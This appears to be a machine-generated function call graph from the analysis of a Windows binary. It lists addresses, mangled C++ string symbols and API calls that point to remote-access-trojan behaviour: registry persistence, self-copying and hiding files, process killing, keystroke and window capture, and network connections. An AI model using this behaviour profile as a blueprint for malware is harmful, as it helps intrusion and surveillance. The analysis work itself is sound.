GetModuleFileNameW 5442->5443 5444 4010db CreateThread 5442->5444 5445 411650 5443->5445 5444->5443 5928 401216 5444->5928 5446 408706 5445->5446 5447 41165d GetCurrentProcess 5445->5447 5448 40a87f 5446->5448 5447->5446 5449 40a89b RegOpenKeyExA 5448->5449 5451 40a8e7 5449->5451 5452 40a8b8 RegQueryValueExA RegCloseKey 5449->5452 5453 40a8f0 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ 5451->5453 5452->5453 5453->5139 5455 40a9ef 3 API calls 5454->5455 5456 403199 5455->5456 5457 4031a0 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ 5456->5457 5458 4031de 5456->5458 5459 40aa65 7 API calls 5457->5459 5458->5143 5460 4031c8 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 5459->5460 5461 40acb8 17 API calls 5460->5461 5461->5458 5463 4087cf 5462->5463 5464 40a7fc RegQueryValueExA RegCloseKey 5462->5464 5463->5143 5465 40300f LoadLibraryA GetProcAddress 5463->5465 5464->5463 5467 403035 5465->5467 5466 40a87f 4 API calls 5468 40306a ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 5466->5468 5467->5466 5469 40312b 5467->5469 5470 40ac55 13 API calls 5468->5470 5469->5143 5471 4030b7 ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@ 5470->5471 5472 40ab16 7 API calls 5471->5472 5473 4030e1 5472->5473 5474 4080e4 48 API calls 5473->5474 5475 4030f1 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ ShellExecuteW 5474->5475 5476 403112 exit 5475->5476 5477 403119 ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 5475->5477 5476->5477 5477->5469 5478->5149 5940 4127a4 free 5479->5940 5481 411450 ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@ ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 5481->5159 5483 40828a 12 API calls 5482->5483 5484 40815d 5482->5484 5483->5226 5485 4081a1 5484->5485 5486 408164 _wgetenv ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG 5484->5486 5487 40816e 5484->5487 5490 411650 GetCurrentProcess 5485->5490 5486->5483 5941 410d97 GetModuleFileNameW ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@ ?find_last_of@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIPBGI ?substr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBE?AV12@II ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 5487->5941 5492 4081a6 5490->5492 5491 40817a ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@ 5493 408203 ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 5491->5493 5494 4081aa 7 API calls 5492->5494 5495 40820b 7 API calls 5492->5495 5493->5483 5494->5493 5495->5493 5497 407305 6 API calls 5496->5497 5498 407357 5496->5498 5499 40737a ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ wcscmp 5497->5499 5500 408137 37 API calls 5498->5500 5501 4073d4 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ CopyFileW 5499->5501 5502 40739b ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ 5499->5502 5503 407366 ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@ 5500->5503 5505 40749b ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ 5501->5505 5506 4073ee 5501->5506 5504 407112 30 API calls 5502->5504 5503->5499 5508 4073ca ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 5504->5508 5507 407112 30 API calls 5505->5507 5506->5505 5509 4073f8 wcslen 5506->5509 5510 4074ca 5507->5510 5508->5184 5511 407455 5509->5511 5512 407409 5509->5512 5513 4074d3 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ SetFileAttributesW wcslen 5510->5513 5514 407504 6 API calls 5510->5514 5516 408137 37 API calls 5511->5516 5515 408137 37 API calls 5512->5515 5513->5514 5517 4074f4 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ SetFileAttributesW 5513->5517 5518 407605 15 API calls 5514->5518 5519 407568 13 API calls 5514->5519 5520 407418 ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@ ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 5515->5520 5521 407460 ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@ 5516->5521 5517->5514 5522 4118f7 4 API calls 5518->5522 5519->5518 5523 40746f ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ CopyFileW 5520->5523 5521->5523 5524 4076c4 5522->5524 5523->5505 5525 40748b ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG 5523->5525 5526 4076f5 ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 5524->5526 5527 4076cb ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ ShellExecuteW 5524->5527 5525->5508 5526->5508 5527->5526 5528 4076ee exit 5527->5528 5528->5526 5530 40ac70 5529->5530 5531 402fc1 4 API calls 5530->5531 5532 40ac85 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 5531->5532 5533 40aa65 7 API calls 5532->5533 5534 40aca5 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 5533->5534 5534->5192 5535->5200 5942 41231d 5536->5942 5540 409289 5539->5540 5541 40911c ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@ CreateToolhelp32Snapshot Process32FirstW Process32NextW 5539->5541 5950 410e7f 5540->5950 5542 409162 5541->5542 5544 40926a CloseHandle ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG 5542->5544 5545 40916a ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@ ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ 5542->5545 5551 4091a7 ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@0 5542->5551 5547 409280 ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 5544->5547 5548 40930a ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 5544->5548 5545->5542 5546 409292 ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@ ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 5549 411650 GetCurrentProcess 5546->5549 5547->5540 5550 409313 CreateMutexA GetModuleHandleA ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ 5548->5550 5552 4092ab 5549->5552 5955 40efb2 5550->5955 5554 4091d6 5551->5554 5555 4091bc ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE Process32NextW 5551->5555 5556 4092e3 ??8std@@YA_NPBGABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ 5552->5556 5557 4092af ?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIPBGI 5552->5557 5944 4116af OpenProcess 5554->5944 5555->5542 5556->5550 5558 4092fa ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 5556->5558 5557->5556 5561 4092cb wcslen ?replace@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@IIPBG 5557->5561 5569 408ac5 5558->5569 5561->5556 5562 409342 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 5567 40ab86 3 API calls 5562->5567 5563 409366 CloseHandle 5563->5558 5564 4091e5 ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@ ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG 5565 40920d ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 5564->5565 5566 40922f ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG 5564->5566 5565->5569 5570 409240 5566->5570 5571 4092fc ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 5566->5571 5567->5558 5569->5177 5569->5190 5947 41167a 5570->5947 5571->5547 5574 409254 ?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@ABV12@ ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 5574->5544 5576 40aa13 RegQueryValueExA RegCloseKey 5575->5576 5577 40aa3b 5575->5577 5576->5577 5577->5186 5579 412694 ShowWindow 5578->5579 5580 41269c freopen printf 5578->5580 5579->5580 5580->5212 5582 4045ca ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 5581->5582 5583 4045ba CreateThread 5581->5583 5582->5266 5583->5582 5983 4045e7 5583->5983 6035 4044c3 GetKeyboardLayout 5584->6035 5587 404536 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ 5590 410cd2 13 API calls 5587->5590 5588 40451e ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ 5589 40512c 11 API calls 5588->5589 5589->5587 5591 40455f CreateThread 5590->5591 5592 404584 CreateThread ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 5591->5592 5593 404578 CreateThread 5591->5593 6037 4045f8 5591->6037 5592->5266 6040 404607 5592->6040 5593->5592 6043 4045d8 5593->6043 5595 4112fa 7 API calls 5594->5595 5596 408107 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ 5595->5596 5597 408137 37 API calls 5596->5597 5598 40811d ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 5597->5598 5598->5300 5600 406e13 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 5599->5600 5601 406e51 5599->5601 5602 40a7dc 3 API calls 5600->5602 5603 406e61 CreateThread 5601->5603 5605 406e5b 5601->5605 5604 406e36 5602->5604 5603->5605 6141 406cf8 Sleep 5603->6141 5604->5601 5606 406e3d ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 5604->5606 5605->5289 5607 40a825 3 API calls 5606->5607 5607->5601 5609 410e1a 6 API calls 5608->5609 5609->5296 6236 410f6c 5610->6236 5612 40bb91 5613 40a87f 4 API calls 5612->5613 5614 40bbaf ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD 5613->5614 5615 40bbd3 5614->5615 5616 40bbc5 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD 5614->5616 5617 401289 6 API calls 5615->5617 5616->5615 5618 40bbe1 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ atoi 5617->5618 5619 40bc02 5618->5619 5620 40bbf5 Sleep 5618->5620 5621 40bc71 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ 5619->5621 5622 40bc0b 7 API calls 5619->5622 5620->5619 5623 401289 6 API calls 5621->5623 5622->5621 5624 40bc8e ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 5623->5624 5625 411550 20 API calls 5624->5625 5641 40bca6 5625->5641 5628 401289 6 API calls 5629 40bcde ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 5628->5629 5630 411550 20 API calls 5629->5630 5631 40bcf3 5630->5631 5632 401289 6 API calls 5631->5632 5633 40bd09 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ gethostbyname 5632->5633 5633->5641 5634 401289 6 API calls 5635 40bd45 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ atoi htons 5634->5635 5635->5641 5636 401289 6 API calls 5639 40c595 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ atoi Sleep 5636->5639 5637 401ad8 2 API calls 5637->5641 5638 40bda4 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD 5638->5641 5639->5641 5640 401289 6 API calls 5642 40bd78 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 5640->5642 5641->5634 5641->5636 5641->5637 5641->5638 5641->5640 5644 40bdd4 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ 5641->5644 6239 401fc3 5641->6239 6244 402022 connect 5641->6244 5642->5641 5645 410cd2 13 API calls 5644->5645 5646 40be02 5645->5646 5647 40be1e sprintf ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@ _itoa 5646->5647 5648 401289 6 API calls 5647->5648 5649 40be64 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 5648->5649 5650 40a9ef 3 API calls 5649->5650 5654 40beac 5650->5654 5651 40beb3 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD 5651->5654 5652 40bed5 ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@ 6245 4113ba ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@ 5652->6245 5654->5651 5654->5652 5655 40bf0a 5657 401289 6 API calls 5655->5657 6246 41127d _itoa ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ 5655->6246 5658 40bf33 GetTickCount 5657->5658 6247 41127d _itoa ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ 5658->6247 5663 4113ba ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@ 5665 40bf4d 5663->5665 5665->5663 6248 411200 GetLastInputInfo GetTickCount 5665->6248 6249 41127d _itoa ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ 5665->6249 6250 4111c5 GetForegroundWindow GetWindowTextW ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@ 5665->6250 6251 4093b5 GetLocaleInfoA ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ 5665->6251 6252 4113ba ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@ 5665->6252 5667 40c012 40 API calls 6253 402049 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 5667->6253 5669 40c2a1 52 API calls 6256 4020d0 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@ ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@ 5669->6256 5671 40c51c 5673 40c534 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ 5671->5673 6265 405020 5671->6265 5674 410cd2 13 API calls 5673->5674 5675 40c55d ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 5674->5675 5675->5641 5676->5311 5680 402f33 5677->5680 5681 402f5c ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 5680->5681 5681->5314 5682->5317 5684 412182 5683->5684 5693 41218f 5684->5693 5686 4115cf ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 5686->5318 5686->5328 5688 412143 5687->5688 5689 401b51 ??2@YAPAXI 5688->5689 5690 41214b 5689->5690 5691 40979c ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 5690->5691 5692 411626 5691->5692 5692->5325 5694 41219b 5693->5694 5697 4121c4 5694->5697 5696 4121b2 5696->5686 5698 412291 5697->5698 5706 4121e3 5697->5706 5699 4122e0 5698->5699 5700 41229f 5698->5700 5703 40979c ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 5699->5703 5723 41226a 5699->5723 5701 40979c ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 5700->5701 5702 4122b1 5701->5702 5704 401b29 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 5702->5704 5705 4122f3 5703->5705 5707 4122ca 5704->5707 5746 4123a0 5705->5746 5724 401b51 5706->5724 5742 412381 5707->5742 5711 412381 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ 5711->5723 5718 40979c ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 5719 412249 5718->5719 5735 401b07 5719->5735 5723->5696 5749 401b88 5724->5749 5726 401b5e 5727 40979c 5726->5727 5728 4097a6 5727->5728 5729 4097bf 5728->5729 5752 401b64 5728->5752 5731 401b29 5729->5731 5732 401b37 5731->5732 5733 401b4b 5731->5733 5732->5733 5734 401b64 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 5732->5734 5733->5718 5734->5732 5736 401b11 5735->5736 5737 401b23 5736->5737 5759 401b78 5736->5759 5739 40439c 5737->5739 5770 4127a4 free 5739->5770 5741 4043a7 5741->5723 5743 412388 5742->5743 5744 41239d 5743->5744 5745 41238d ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ 5743->5745 5744->5723 5745->5743 5747 412303 5746->5747 5748 4123ac ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ 5746->5748 5747->5711 5748->5747 5748->5748 5750 401b92 5749->5750 5751 401b94 ??2@YAPAXI 5749->5751 5750->5751 5751->5726 5755 401ba0 5752->5755 5756 401bad 5755->5756 5757 401bb3 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 5756->5757 5758 401b72 5756->5758 5757->5758 5758->5728 5762 401bc8 5759->5762 5765 401bd7 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 5762->5765 5766 401be9 5765->5766 5768 401b83 5765->5768 5769 4127a4 free 5766->5769 5768->5736 5769->5768 5770->5741 5772 4097cf 5771->5772 5773 4097d4 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ 5772->5773 5774 4096b0 5772->5774 5773->5772 5774->5338 5780 401305 ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@ 5775->5780 5777 401300 5781 41282a 5777->5781 5780->5777 5784 4127fe 5781->5784 5783 401324 5783->5357 5785 412813 __dllonexit 5784->5785 5786 412807 _onexit 5784->5786 5785->5783 5786->5783 5788 40ad60 5787->5788 5789 40ad64 RegDeleteValueW 5787->5789 5788->5367 5789->5367 5791 409e13 5790->5791 5792 4119ab GetFileSize ?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXID ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ReadFile 5790->5792 5791->5375 5791->5376 5793 4119e0 5792->5793 5794 4119e2 CloseHandle 5792->5794 5793->5794 5794->5791 5796 40abc7 5795->5796 5797 40ab9d RegSetValueExA RegCloseKey 5795->5797 5796->5403 5797->5403 5799 411907 CreateFileW 5798->5799 5801 411941 5799->5801 5802 411945 5799->5802 5801->5403 5803 41195b WriteFile 5802->5803 5804 41194b SetFilePointer 5802->5804 5805 411973 CloseHandle 5803->5805 5806 411971 5803->5806 5804->5803 5804->5805 5805->5801 5806->5805 5808 407169 5807->5808 5809 40712b ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@ ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG 5807->5809 5810 4071ad 5808->5810 5811 40716f ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@ ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG 5808->5811 5828 40ab16 RegCreateKeyW 5809->5828 5815 4071b3 ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@ ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0 ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG 5810->5815 5816 407225 5810->5816 5814 40ab16 7 API calls 5811->5814 5813 40715d ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 5813->5808 5817 4071a1 ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 5814->5817 5818 40ab16 7 API calls 5815->5818 5819 40722b ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@ ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0 ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG 5816->5819 5820 40729d 5816->5820 5817->5810 5821 407207 ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 5818->5821 5822 40ab16 7 API calls 5819->5822 5823 4072e1 5820->5823 5824 4072a3 ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@ ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG 5820->5824 5821->5816 5825 40727f ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 5822->5825 5823->5393 5826 40ab16 7 API calls 5824->5826 5825->5820 5827 4072d5 ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 5826->5827 5827->5823 5829 40ab79 ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 5828->5829 5830 40ab2d ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ RegSetValueExW RegCloseKey 5828->5830 5829->5813 5831 40ab68 5830->5831 5832 40ab6a ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 5830->5832 5831->5832 5832->5813 5833->5416 5835 401285 5834->5835 5836 40123f 5834->5836 5835->5422 5837 401289 6 API calls 5836->5837 5838 401252 ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD 5837->5838 5839 401261 exit 5838->5839 5840 401269 5838->5840 5839->5840 5841 401289 6 API calls 5840->5841 5842 401277 ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD 5841->5842 5842->5835 5843 401280 5842->5843 5848 40770c 5843->5848 5845->5429 5847 401094 5846->5847 5847->5439 5847->5441 5893 40a109 TerminateProcess WaitForSingleObject 5848->5893 5850 40771d 5851 407730 5850->5851 5894 406079 TerminateThread 5850->5894 5853 40773e 5851->5853 5899 4100c6 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ 5851->5899 5854 407747 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ 5853->5854 5858 407758 5853->5858 5902 41178f wcscpy wcscat wcscpy wcscat FindFirstFileW 5854->5902 5857 40776c ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ 5859 40ad45 2 API calls 5857->5859 5858->5857 5862 40777f 5858->5862 5859->5862 5860 407790 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ 5863 40ad45 2 API calls 5860->5863 5861 4077a3 5864 4077b4 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ 5861->5864 5865 4077d6 5861->5865 5862->5860 5862->5861 5863->5861 5917 40aa65 RegCreateKeyA 5864->5917 5866 4077e2 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ 5865->5866 